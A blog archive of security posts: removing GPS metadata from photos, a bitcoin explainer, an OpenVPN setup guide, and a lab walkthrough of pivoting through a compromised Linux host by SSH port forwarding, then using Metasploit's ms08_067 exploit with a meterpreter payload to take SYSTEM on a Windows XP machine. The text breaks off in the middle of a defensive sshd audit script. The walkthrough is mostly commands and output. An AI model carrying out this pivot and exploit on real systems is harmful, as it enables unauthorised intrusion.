Sunday, July 16, 2017

Location Service in Pictures

Background
Posting pictures on social media is the trend these days. People like to show off their lifestyle, kids, vacations, material possessions, spouses, gf/bf, etc. While it is entirely an individual choice to do so, not many people are aware that pictures taken with mobile apps can carry location data from the phone's built-in location service. Usually, these apps prompt the user with an option to either activate or deactivate it. There are sneaky apps that don't. Some can even activate it without your consent and sneakily deactivate it after you have used it; however, this is no longer possible with newer versions of Android, as Google has disallowed apps from directly accessing the GPS service. Beware, there are apps available in the Play Store posing as legitimate ones, though you are more likely to pick up malware from 3rd party sites. In the case of iOS, the chance is lower since 3rd party apps are not available on Apple phones.

What is Location Service?
Location service is basically GPS coordinates mapped onto a geographical map. Almost all mobile devices now have a GPS chip built in. People switch on GPS when using Waze or Google Maps. A modern GPS receiver locks on to 4 low-orbiting satellites to home in on your precise location and is accurate to within 4 meters! In the past, such accuracy was only available to the military, but these days it is free for anyone. Google's location service collates information from 3 different sources:

1. GPS - the primary choice and the most accurate.
2. WiFi signal - accuracy depends on the signal strength; Google keeps a location list of common public hotspots such as airports, train terminals and Starbucks outlets around the world.
3. Cellular base station transmission - accurate to within a few hundred meters, based on triangulation of the handset's signal strength relative to the distance to 1 or more base stations.

Location Service Dissected
In this article, I will explain how to detect location data in your pictures. Such data is also referred to as metadata, or data about data. Firstly, let's take a photo with the location service turned ON.

Picture above was taken with Location Service turned ON
Most modern operating systems are able to detect metadata tags embedded in popular picture formats such as JPEG, GIF, TIFF, PNG and BMP. Here's an example of a GPS coordinate in a picture detected using Windows:



On Android:



More extensive metadata can be read using an EXIF tool. Here's a sample of the metadata detected on Linux:



Who Needs Such a Service, and Why?
From a commercial point of view, such information is useful for marketing purposes. Mobile apps are not free without a reason; there must be some commercial return for providing a 'free' service. How do you think Google, Facebook, Instagram and Twitter make so much $$$$? Whatever information you post is stored for analytics on their servers. We are talking about terabytes of data from around the world! It can be used to create targeted advertisements based on individual preferences. Imagine if you knew your customers' precise location, favourite food, hangout spots, clothes, shopping behaviour, names, age, etc. They virtually know which products and services will entice you. These companies know a lot more about you than you are consciously aware of. Location service is just the tip of the iceberg. For example, Google & FB have been around for at least a decade; we have our emails, pictures, practically our whole life story stored on their servers! These giants also acquire other companies. A good example was the acquisition of Instagram & Waze by FB and Google respectively. So now, they also know where you travel and what you see! Reminds me of Skynet in the Terminator movie!

How To Protect Myself?
Unless you are a criminal or someone wanted, I wouldn't be too worried about your personal information being mined; after all, it is primarily for commercial purposes. But I would be careful of overexposing your personal information for everybody to see. These companies are usually governed by local privacy laws; depending on which country you live in, your personal information should be protected. However, that doesn't mean you should happily post information that can further incriminate you, such as pictures of your kids' school, your private residence, car registration, social security ID, passport, banking details, etc. One very important step before you install any mobile app is to check its permission settings. On Android, this can be seen in Settings - Apps - Apps Info. See screenshot below:

Note that the above app needs location service and camera permissions. That means it can activate your phone's camera and GPS when needed ;-) Where possible, you may opt to deactivate some of these permissions, but the app might complain or cease to function. The final decision to install the app is up to you; if you are confident that the app is trusted, by all means go ahead and install it.

Screenshot Depicts the App Permission Settings which can be changed
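The metadata detection shown above, and the stripping step that belongs alongside the permission review, as an added example that is not part of the original post: a small Python parser, using only the standard library, that walks the JPEG segments, decodes the EXIF GPS IFD into decimal degrees, and rebuilds the file with the Exif segment removed. The sample JPEG is constructed inline with made-up coordinates and carries metadata only, no image data.

```python
import struct

EXIF_PREFIX = b"Exif\x00\x00"
GPS_IFD_TAG = 0x8825          # IFD0 entry that points at the GPS sub-IFD
LAT_REF, LAT, LON_REF, LON = 0x0001, 0x0002, 0x0003, 0x0004


def split_segments(jpeg):
    """Split a JPEG into (marker, raw_segment) pairs up to the scan data / EOI."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    segs, pos = [], 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF and jpeg[pos + 1] not in (0xD9, 0xDA):
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        segs.append((jpeg[pos + 1], jpeg[pos:pos + 2 + length]))
        pos += 2 + length
    return segs, jpeg[pos:]


def _is_exif(marker, raw):
    return marker == 0xE1 and raw[4:10] == EXIF_PREFIX


def extract_gps(jpeg):
    """Return (lat, lon) in decimal degrees from the EXIF GPS IFD, or None if absent."""
    tiff = next((raw[10:] for m, raw in split_segments(jpeg)[0] if _is_exif(m, raw)), None)
    if tiff is None:
        return None
    end = "<" if tiff[:2] == b"II" else ">"          # TIFF byte order: II = little, MM = big
    u16 = lambda off: struct.unpack(end + "H", tiff[off:off + 2])[0]
    u32 = lambda off: struct.unpack(end + "I", tiff[off:off + 4])[0]

    def read_ifd(off):
        # Each 12-byte entry: tag(2) type(2) count(4) value-or-offset(4)
        return {u16(e): (u16(e + 2), u32(e + 4), e + 8)
                for e in (off + 2 + 12 * i for i in range(u16(off)))}

    ifd0 = read_ifd(u32(4))
    if GPS_IFD_TAG not in ifd0:
        return None
    gps = read_ifd(u32(ifd0[GPS_IFD_TAG][2]))
    if not all(t in gps for t in (LAT_REF, LAT, LON_REF, LON)):
        return None

    def ref(tag):                                     # ASCII, short enough to live inline
        _, count, vfield = gps[tag]
        return tiff[vfield:vfield + count].rstrip(b"\x00").decode("ascii")

    def dms(tag):                                     # three RATIONALs never fit inline
        off = u32(gps[tag][2])
        d, m, s = (u32(off + 8 * i) / u32(off + 8 * i + 4) for i in range(3))
        return d + m / 60 + s / 3600

    lat = dms(LAT) * (-1 if ref(LAT_REF) == "S" else 1)
    lon = dms(LON) * (-1 if ref(LON_REF) == "W" else 1)
    return round(lat, 6), round(lon, 6)


def strip_exif(jpeg):
    """Rebuild the JPEG without any APP1/Exif segment (do this before posting a photo)."""
    segs, rest = split_segments(jpeg)
    kept = b"".join(raw for m, raw in segs if not _is_exif(m, raw))
    return jpeg[:2] + kept + rest


def build_sample_jpeg(lat_dms, lat_ref, lon_dms, lon_ref):
    """Constructed sample: SOI + one little-endian Exif APP1 segment + EOI, no image data."""
    rat = lambda vals: b"".join(struct.pack("<II", int(v * 1000), 1000) for v in vals)
    ifd0_off = 8                                     # right after the 8-byte TIFF header
    gps_off = ifd0_off + 2 + 12 + 4                  # count + one entry + next-IFD pointer
    data_off = gps_off + 2 + 4 * 12 + 4              # four GPS entries
    tiff = b"II*\x00" + struct.pack("<I", ifd0_off)
    tiff += struct.pack("<H", 1) + struct.pack("<HHII", GPS_IFD_TAG, 4, 1, gps_off) + b"\x00" * 4
    tiff += struct.pack("<H", 4)
    tiff += struct.pack("<HHI", LAT_REF, 2, 2) + lat_ref.encode() + b"\x00" * 3
    tiff += struct.pack("<HHII", LAT, 5, 3, data_off)
    tiff += struct.pack("<HHI", LON_REF, 2, 2) + lon_ref.encode() + b"\x00" * 3
    tiff += struct.pack("<HHII", LON, 5, 3, data_off + 24)
    tiff += b"\x00" * 4 + rat(lat_dms) + rat(lon_dms)
    app1 = EXIF_PREFIX + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


# Constructed coordinates (1°17'24"N 103°51'00"E), not taken from any real photo.
SAMPLE_JPEG = build_sample_jpeg((1, 17, 24), "N", (103, 51, 0), "E")

if __name__ == "__main__":
    print("GPS in sample:", extract_gps(SAMPLE_JPEG))                 # (1.29, 103.85)
    print("GPS after strip:", extract_gps(strip_exif(SAMPLE_JPEG)))   # None
```

Run it against a real photo by reading the file bytes into `extract_gps`; a phone that had the location service ON will return coordinates, and `strip_exif` gives you the bytes to upload instead.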

Summary
The world is becoming smaller; with the advent of social media and the Internet, we are certainly more connected. Practising self-censorship and user discretion is imperative in creating a safer world. Remember, information security is everyone's responsibility, and it is our responsibility to educate the people that we love.






Saturday, July 15, 2017

What's The Fuss With Bitcoins?

Bitcoins are all the rage now. People are talking about the cryptocurrency and are buying it in the hope that its value will increase in the future. So what's bitcoin? To sum it up, bitcoin is a virtual currency created by a mysterious person by the name of Satoshi Nakamoto; no one really knows his real identity, though there have been documented cases of 'him' being arrested in Australia.

Basically, bitcoin is a product of a computed algorithm with a finite supply. Its value is determined by general supply and demand. While there is no central organization that governs it, it is mined by computers participating in a shared ledger (known as the blockchain) around the world. When it was first introduced, it was easy to compute/mine a bitcoin, but over the years the algorithm's computational difficulty has increased, making it harder to create. This was done by design, to control its value. Anyone who wishes to trade in bitcoin will have an electronic wallet that is protected by a private key with a passphrase. It can be stored offline on a USB drive or online with a bitcoin exchange service. When a transaction is made, all computers in the blockchain update their individual ledgers. It is akin to everyone in the room updating their 'I owe you' books. For example, if you borrow 1 dollar from Jim, everyone in the room will take note of it, and when you pay him back, they will make a note of it again. In order to mine more bitcoins, computers in this blockchain have to compute an algorithm that validates these transactions. These 'miners' are rewarded with a bitcoin value.

Some people predict that bitcoin's value will increase in the future; what makes it more attractive is that more and more merchants on the Internet are accepting bitcoins as payment for goods and services. There are also bitcoin 'exchange' services on the net that provide conversion of bitcoin to currency for a small service fee.

From a security perspective, bitcoin provides anonymity, as you do not need to reveal your personal identity to be part of its blockchain. Every wallet is identified by a computed hash value. However, be sure to protect your bitcoin wallet, and never fully trust bitcoin exchanges with your private key. If someone gets hold of it, he can make transactions using your wallet. There was a recent case of a bitcoin exchange being hacked; as a result, many people incurred losses.


Setting Up Your Own VPN Server

In my last article, I touched on protecting your data. One of the suggested mitigations is to encrypt data during transmission. Whenever you connect to an untrusted network such as a public WiFi hotspot, you should turn on your VPN immediately. In my article today, I will describe the steps to set up your own VPN server. I recommend setting up your own server rather than purchasing VPN services off the net, because you will have more control over the encryption level and the granularity of its logs. Beware, some free VPN services keep logs of your connections for commercial purposes. Also, some VPN services are configured with weak encryption or incorrect configurations that can lead to unwanted data leaks.

The OpenVPN package is an open source solution and is free. Firstly, you will need to find a VPS (Virtual Private Server) that supports TUN (tunneling). I recommend vpscheap. The Internet speed is fast and they don't limit your bandwidth.

VPS Configuration

Firstly, switch the TUN/TAP option ON in the VPS control panel:


Once that is done, you will need to log in to your VPS operating system. I recommend Ubuntu 14 64-bit. I won't cover the steps on setting it up here, as it is quite straightforward once you have bought a VPS subscription.

OpenVPN Server installation
On the operating system of your choice, install OpenVPN using the root account:

1. apt-get update
2. apt-get install openvpn

OpenVPN Server configuration

Now, create a simple config file:

# Which local IP address should OpenVPN
# listen on? (optional)
local xxx.xxx.xxx.xxx   # your server IP address here

# Which TCP/UDP port should OpenVPN listen on?
# If you want to run multiple OpenVPN instances
# on the same machine, use a different port
# number for each one.  You will need to
# open up this port on your firewall.
port 1194

# TCP or UDP server?
proto udp

# "dev tun" will create a routed IP tunnel,
# "dev tap" will create an ethernet tunnel.
# Use "dev tap0" if you are ethernet bridging
# and have precreated a tap0 virtual interface
# and bridged it with your ethernet interface.
# If you want to control access policies
# over the VPN, you must create firewall
# rules for the TUN/TAP interface.
# On non-Windows systems, you can give
# an explicit unit number, such as tun0.
# On Windows, use "dev-node" for this.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
;dev tap
dev tun

# Windows needs the TAP-Win32 adapter name
# from the Network Connections panel if you
# have more than one.  On XP SP2 or higher,
# you may need to selectively disable the
# Windows firewall for the TAP adapter.
# Non-Windows systems usually don't need this.
;dev-node MyTap

# SSL/TLS root certificate (ca), certificate
# (cert), and private key (key).  Each client
# and the server must have their own cert and
# key file.  The server and all clients will
# use the same ca file.
#
# See the "easy-rsa" directory for a series
# of scripts for generating RSA certificates
# and private keys.  Remember to use
# a unique Common Name for the server
# and each of the client certificates.
#
# Any X509 key management system can be used.
# OpenVPN can also use a PKCS #12 formatted key file
# (see "pkcs12" directive in man page).
ca ca.crt
cert cert.crt
key secret.key  # This file should be kept secret

# Diffie-Hellman parameters.
# Generate your own with:
#   openssl dhparam -out dh1024.pem 1024
# Substitute 2048 for 1024 if you are using
# 2048 bit keys. 
dh dh2048.pem

# Configure server mode and supply a VPN subnet
# for OpenVPN to draw client addresses from.
# The server will take 10.8.0.1 for itself,
# the rest will be made available to clients.
# Each client will be able to reach the server
# on 10.8.0.1. Comment this line out if you are
# ethernet bridging. See the man page for more info.
server 10.8.0.0 255.255.255.0

# Maintain a record of client <-> virtual IP address
# associations in this file.  If OpenVPN goes down or
# is restarted, reconnecting clients can be assigned
# the same virtual IP address from the pool that was
# previously assigned.
ifconfig-pool-persist ipp.txt

# Configure server mode for ethernet bridging.
# You must first use your OS's bridging capability
# to bridge the TAP interface with the ethernet
# NIC interface.  Then you must manually set the
# IP/netmask on the bridge interface, here we
# assume 10.8.0.4/255.255.255.0.  Finally we
# must set aside an IP range in this subnet
# (start=10.8.0.50 end=10.8.0.100) to allocate
# to connecting clients.  Leave this line commented
# out unless you are ethernet bridging.
;server-bridge 10.8.0.4 255.255.255.0 10.8.0.50 10.8.0.100

# Configure server mode for ethernet bridging
# using a DHCP-proxy, where clients talk
# to the OpenVPN server-side DHCP server
# to receive their IP address allocation
# and DNS server addresses.  You must first use
# your OS's bridging capability to bridge the TAP
# interface with the ethernet NIC interface.
# Note: this mode only works on clients (such as
# Windows), where the client-side TAP adapter is
# bound to a DHCP client.
;server-bridge

# Push routes to the client to allow it
# to reach other private subnets behind
# the server.  Remember that these
# private subnets will also need
# to know to route the OpenVPN client
# address pool (10.8.0.0/255.255.255.0)
# back to the OpenVPN server.
;push "route 192.168.10.0 255.255.255.0"
;push "route 192.168.20.0 255.255.255.0"

# To assign specific IP addresses to specific
# clients or if a connecting client has a private
# subnet behind it that should also have VPN access,
# use the subdirectory "ccd" for client-specific
# configuration files (see man page for more info).

# EXAMPLE: Suppose the client
# having the certificate common name "Thelonious"
# also has a small subnet behind his connecting
# machine, such as 192.168.40.128/255.255.255.248.
# First, uncomment out these lines:
;client-config-dir ccd
;route 192.168.40.128 255.255.255.248
# Then create a file ccd/Thelonious with this line:
#   iroute 192.168.40.128 255.255.255.248
# This will allow Thelonious' private subnet to
# access the VPN.  This example will only work
# if you are routing, not bridging, i.e. you are
# using "dev tun" and "server" directives.

# EXAMPLE: Suppose you want to give
# Thelonious a fixed VPN IP address of 10.9.0.1.
# First uncomment out these lines:
;client-config-dir ccd
;route 10.9.0.0 255.255.255.252
# Then add this line to ccd/Thelonious:
#   ifconfig-push 10.9.0.1 10.9.0.2

# Suppose that you want to enable different
# firewall access policies for different groups
# of clients.  There are two methods:
# (1) Run multiple OpenVPN daemons, one for each
#     group, and firewall the TUN/TAP interface
#     for each group/daemon appropriately.
# (2) (Advanced) Create a script to dynamically
#     modify the firewall in response to access
#     from different clients.  See man
#     page for more info on learn-address script.
;learn-address ./script

# If enabled, this directive will configure
# all clients to redirect their default
# network gateway through the VPN, causing
# all IP traffic such as web browsing and
# and DNS lookups to go through the VPN
# (The OpenVPN server machine may need to NAT
# or bridge the TUN/TAP interface to the internet
# in order for this to work properly).
push "redirect-gateway def1 bypass-dhcp"

# Certain Windows-specific network settings
# can be pushed to clients, such as DNS
# or WINS server addresses.  CAVEAT:
# http://openvpn.net/faq.html#dhcpcaveats
# The addresses below are Google's public
# DNS servers (8.8.8.8 and 8.8.4.4).
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"

# Uncomment this directive to allow different
# clients to be able to "see" each other.
# By default, clients will only see the server.
# To force clients to only see the server, you
# will also need to appropriately firewall the
# server's TUN/TAP interface.
;client-to-client

# Uncomment this directive if multiple clients
# might connect with the same certificate/key
# files or common names.  This is recommended
# only for testing purposes.  For production use,
# each client should have its own certificate/key
# pair.
#
# IF YOU HAVE NOT GENERATED INDIVIDUAL
# CERTIFICATE/KEY PAIRS FOR EACH CLIENT,
# EACH HAVING ITS OWN UNIQUE "COMMON NAME",
# UNCOMMENT THIS LINE OUT.
duplicate-cn

# The keepalive directive causes ping-like
# messages to be sent back and forth over
# the link so that each side knows when
# the other side has gone down.
# With the values below, ping every 120 seconds
# and assume that the remote peer is down if no
# ping is received during a 340 second period.
keepalive 120 340

# For extra security beyond that provided
# by SSL/TLS, create an "HMAC firewall"
# to help block DoS attacks and UDP port flooding.
#
# Generate with:
#   openvpn --genkey --secret ta.key
#
# The server and each client must have
# a copy of this key.
# The second parameter should be '0'
# on the server and '1' on the clients.
;tls-auth ta.key 0 # This file is secret

# Select a cryptographic cipher.
# This config item must be copied to
# the client config file as well.
;cipher BF-CBC        # Blowfish (default)
cipher AES-128-CBC   # AES
;cipher DES-EDE3-CBC  # Triple-DES

# Enable compression on the VPN link.
# If you enable it here, you must also
# enable it in the client config file.
comp-lzo

# The maximum number of concurrently connected
# clients we want to allow.
max-clients 6

# It's a good idea to reduce the OpenVPN
# daemon's privileges after initialization.
#
# You can uncomment this out on
# non-Windows systems.
user nobody
group nogroup

# The persist options will try to avoid
# accessing certain resources on restart
# that may no longer be accessible because
# of the privilege downgrade.
persist-key
persist-tun

# Output a short status file showing
# current connections, truncated
# and rewritten every minute.
;status openvpn-status.log

# By default, log messages will go to the syslog (or
# on Windows, if running as a service, they will go to
# the "\Program Files\OpenVPN\log" directory).
# Use log or log-append to override this default.
# "log" will truncate the log file on OpenVPN startup,
# while "log-append" will append to it.  Use one
# or the other (but not both).
;log         openvpn.log
;log-append  openvpn.log

# Set the appropriate level of log
# file verbosity.
#
# 0 is silent, except for fatal errors
# 4 is reasonable for general usage
# 5 and 6 can help to debug connection problems
# 9 is extremely verbose
verb 3

# Silence repeating messages.  At most 20
# sequential messages of the same message
# category will be output to the log.

;mute 20

Save the file as server.conf in /etc/openvpn/. Now, you will need to create the following certs:

1. ca.crt
2. cert.crt
3. secret.key


Create your certs

The steps for creating the certs can be found here or here.

Once you have created them, save these certs in /etc/openvpn/.

Start openvpn service:

# service openvpn start

OR

# openvpn /etc/openvpn/server.conf

Set up iptables to SNAT/MASQUERADE the connections outbound from your VPN server:

# iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to <your public ip here>


Activate IP forwarding in /etc/sysctl.conf:

net.ipv4.ip_forward = 1


If everything went right, you should not see any errors, which means the OpenVPN server is successfully running on your VPS.

OpenVPN Client Installation and configuration

Create the following client config:

# Specify that we are a client and that we
# will be pulling certain config file directives
# from the server.
client

# Use the same setting as you are using on
# the server.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
;dev tap
dev tun

# Windows needs the TAP-Win32 adapter name
# from the Network Connections panel
# if you have more than one.  On XP SP2,
# you may need to disable the firewall
# for the TAP adapter.
;dev-node MyTap

# Are we connecting to a TCP or
# UDP server?  Use the same setting as
# on the server.
proto udp

# The hostname/IP and port of the server.
# You can have multiple remote entries
# to load balance between the servers.
remote aaa.bbb.ccc.ddd xxx   # your OpenVPN server address and port here (1194 in the server config above)
;remote my-server-2 1194

# Choose a random host from the remote
# list for load-balancing.  Otherwise
# try hosts in the order specified.
;remote-random

# Keep trying indefinitely to resolve the
# host name of the OpenVPN server.  Very useful
# on machines which are not permanently connected
# to the internet such as laptops.
resolv-retry infinite

# Most clients don't need to bind to
# a specific local port number.
nobind

# Downgrade privileges after initialization (non-Windows only)
;user nobody
;group nogroup

# Try to preserve some state across restarts.
persist-key
persist-tun

# If you are connecting through an
# HTTP proxy to reach the actual OpenVPN
# server, put the proxy server/IP and
# port number here.  See the man page
# if your proxy server requires
# authentication.
;http-proxy-retry # retry on connection failures
;http-proxy [proxy server] [proxy port #]

# Wireless networks often produce a lot
# of duplicate packets.  Set this flag
# to silence duplicate packet warnings.
;mute-replay-warnings

# SSL/TLS parms.
# See the server config file for more
# description.  It's best to use
# a separate .crt/.key file pair
# for each client.  A single ca
# file can be used for all clients.
ca ca.crt
cert client1.crt
key client.key

# Verify server certificate by checking
# that the certificate has the nsCertType
# field set to "server".  This is an
# important precaution to protect against
# a potential attack discussed here:
#  http://openvpn.net/howto.html#mitm
#
# To use this feature, you will need to generate
# your server certificates with the nsCertType
# field set to "server".  The build-key-server
# script in the easy-rsa folder will do this.
ns-cert-type server

# If a tls-auth key is used on the server
# then every client must also have the key.
;tls-auth ta.key 1

# Select a cryptographic cipher.
# If the cipher option is used on the server
# then you must also specify it here.
cipher AES-128-CBC

# Enable compression on the VPN link.
# Don't enable this unless it is also
# enabled in the server config file.
comp-lzo

# Set log file verbosity.
verb 3

# Silence repeating messages

;mute 20

The client.conf file along with the certs should be transferred to your client device. The steps below describe how to configure an Android device to connect to the OpenVPN server:

1. Download your favourite VPN client; I recommend the OpenVPN client.
2. Transfer client.conf along with the following certs:

   ca.crt
   client1.crt
   client.key

3. Load client.conf into the VPN client.
4. Connect to your VPN server.
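To catch the weak or inconsistent settings mentioned at the top of this post before the server goes live, here is an added linter that is not from the original post or the OpenVPN project: it parses server.conf and client.conf the way OpenVPN reads them (`#` and `;` start comments) and flags the findings a reviewer would raise against the configs above, plus the settings that must agree on both ends. The embedded configs are constructed excerpts mirroring those above, and the client's remote address 203.0.113.10 is a documentation placeholder.

```python
import re
import shlex

# Constructed excerpts that mirror the server.conf and client.conf written above.
# 203.0.113.10 is a documentation placeholder, not a real server.
SERVER_CONF = """\
port 1194
proto udp
dev tun
ca ca.crt
cert cert.crt
key secret.key  # This file should be kept secret
dh dh2048.pem
server 10.8.0.0 255.255.255.0
push "redirect-gateway def1 bypass-dhcp"
duplicate-cn
keepalive 120 340
;tls-auth ta.key 0 # This file is secret
;cipher BF-CBC        # Blowfish (default)
cipher AES-128-CBC   # AES
comp-lzo
user nobody
group nogroup
verb 3
"""

CLIENT_CONF = """\
client
dev tun
proto udp
remote 203.0.113.10 1194
ns-cert-type server
;tls-auth ta.key 1
cipher AES-128-CBC
comp-lzo
verb 3
"""

WEAK_CIPHERS = {"BF-CBC", "DES-CBC", "DES-EDE3-CBC", "RC2-CBC", "none"}


def parse_conf(text):
    """Map each active directive to a list of its argument lists.
    '#' and ';' begin comments, at line start or after whitespace, as in the sample config."""
    conf = {}
    for line in text.splitlines():
        active = re.split(r"^[#;]|\s[#;]", line, maxsplit=1)[0].strip()
        if active:
            name, *args = shlex.split(active)      # shlex keeps quoted push arguments whole
            conf.setdefault(name, []).append(args)
    return conf


def first_arg(conf, directive, default=None):
    return conf[directive][0][0] if conf.get(directive) and conf[directive][0] else default


def audit_server(conf):
    """Findings for the server side: the settings that weaken this particular config."""
    findings = []
    if "tls-auth" not in conf and "tls-crypt" not in conf:
        findings.append("no tls-auth/tls-crypt: the TLS control channel answers anyone, so "
                        "the port is fingerprintable and exposed to UDP floods")
    if "duplicate-cn" in conf:
        findings.append("duplicate-cn: one leaked client cert works from any number of devices "
                        "and the status log cannot tell them apart")
    if "comp-lzo" in conf or "compress" in conf:
        findings.append("compression (comp-lzo) enabled: compressing data inside the tunnel "
                        "leaks information through compression side channels")
    cipher = first_arg(conf, "cipher", "BF-CBC")     # BF-CBC was the implicit default
    if cipher in WEAK_CIPHERS:
        findings.append(f"cipher {cipher}: 64-bit block cipher or no cipher; use an AES mode")
    if "user" not in conf or "group" not in conf:
        findings.append("daemon keeps root after startup: add 'user nobody' and 'group nogroup'")
    return findings


def check_pair(server, client):
    """Settings that must agree on both ends, or the tunnel will not come up cleanly."""
    issues = []
    for directive in ("proto", "dev", "cipher"):
        s, c = first_arg(server, directive), first_arg(client, directive)
        if s != c:
            issues.append(f"{directive} mismatch: server={s} client={c}")
    for directive in ("comp-lzo", "tls-auth"):
        if (directive in server) != (directive in client):
            issues.append(f"{directive} is set on only one side")
    if "ns-cert-type" in client:
        issues.append("client uses ns-cert-type (deprecated in 2.4, removed in 2.5); "
                      "use 'remote-cert-tls server' instead")
    return issues


if __name__ == "__main__":
    server, client = parse_conf(SERVER_CONF), parse_conf(CLIENT_CONF)
    for line in audit_server(server) + check_pair(server, client):
        print("-", line)
```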

In summary, using a correctly configured VPN will protect your privacy and your connection from hijacking, but it will NOT protect you from identity theft or intrusions. Always practise safe browsing and never post sensitive information on the Internet. Regardless of which website you are submitting personal data to, always scrutinise the need to provide them your personal info.

Tuesday, July 4, 2017

Getting Around Multihome Hosts - Part II

In my first article I described how to pivot around a multihomed host using meterpreter. However, if you don't have the luxury of using one, or choose not to, all hope is not lost. You can still use other methods of pivoting. In this second installment, I will describe a method of pivoting commonly used on Unix/Linux hosts.

SSH (Secure Shell) is a common encrypted protocol installed by default on almost all Linux hosts for remote administration. It provides administrators with command line access to run administrative tasks. Upon successfully owning a machine running SSH, it is trivial to use it to forward connections to other hosts securely. With OpenSSH, you have 3 methods of forwarding: local port forwarding (-L), remote port forwarding (-R) and SOCKS (-D). We will be using the first method.

Host A is a Linux host with OpenSSH installed by default. Host B is a Windows host without ssh.

Depiction of Hosts:

<Attacker host> ------------------- <Host A> -------------------- <Host B>
IP: 192.168.0.182               eth0: 192.168.0.191         192.168.52.134
                                     eth1: 192.168.52.135
     
We assume that you have fully compromised Host A with root rights. By doing so, you should already have the root credentials to remotely SSH to Host A; the objective is to further compromise Host B.
                                              
On Attacker Host
We map port 445 to localhost using ssh.

# ssh -L 445:192.168.52.134:445 root@192.168.0.191
root@192.168.0.191's password: 
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
Last login: Tue Jun 20 05:59:22 2017
root@hostA:~#

Since we'll be exploiting Host B using msf, I would like to map the meterpreter port 4444 locally too. Extending the above command, we can forward both services in one command:
# ssh -L 445:192.168.52.134:445 -L 4444:192.168.52.134:4444 root@192.168.0.191 
On another terminal on Host A, check your netstat: 
# netstat -an | more
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.1:4444          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:445           0.0.0.0:*               LISTEN     
tcp        0      0 192.168.0.182:49620     192.168.0.191:22        ESTABLISHED
<--snip--> 
 
Now we have 2 ports mapped to localhost. Let's use nmap to fingerprint the OS of Host B; note that Host B's port 445 is now reachable on localhost through the forward:
# nmap -A -p 445 127.0.0.1 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-20 09:16 SGT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000088s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows XP microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.8 - 4.6
Network Distance: 0 hops
Service Info: OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 17h28m05s, deviation: 0s, median: 17h28m05s
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: tt-af6d434411ff
|   NetBIOS computer name: TT-AF6D434411FF
|   Workgroup: WORKGROUP
|_  System time: 2017-06-20T11:45:10-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds 
 
Great! Now we can see the OS type is WinXP; let's use msf to exploit it using netapi:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp

I changed the payload to bind_tcp instead of reverse_tcp because port 4444 is already listening locally, and reverse_tcp won't work if it is.

msf exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    127.0.0.1        yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     127.0.0.1        no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > run

[*] Started bind handler
[*] Sending stage (957487 bytes) to 127.0.0.1
[*] 127.0.0.1:445 - Automatically detecting the target...
[*] 127.0.0.1:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 127.0.0.1:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 127.0.0.1:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (127.0.0.1:40987 -> 127.0.0.1:4444) at 2017-06-20 09:31:22 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter
 
There you go! Some people might ask, how do I port scan Host B from the attacker host? Unfortunately, because Host B is a Windows machine and doesn't have OpenSSH installed, we can't set up the SOCKS service using ssh. If this happens, you have to rely on Host A directly to recon Host B. In the next article, I will discuss how to pivot from a Windows host.
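From the defender's side, what made this pivot possible on Host A was an SSH daemon that accepted a root password login and permitted TCP forwarding for every account. The following added example (not part of the original post) audits an sshd_config for exactly those settings, resolving it the way sshd does: the first value for a keyword wins, and anything under a Match line is conditional rather than global. The config text is a constructed excerpt, and the defaults table assumes the OpenSSH 5.x/6.x behaviour of the Ubuntu 12.04 host shown above.

```python
import re

# Constructed sshd_config excerpt resembling an Ubuntu 12.04-era default, i.e. the
# state Host A above was in: root may log in with a password and forwarding is on.
SSHD_CONFIG = """\
Port 22
Protocol 2
PermitRootLogin yes
#PasswordAuthentication yes
X11Forwarding yes
UsePAM yes
Match User backup
    AllowTcpForwarding no
"""

# Assumed defaults of OpenSSH 5.x/6.x when a keyword is absent (newer releases default
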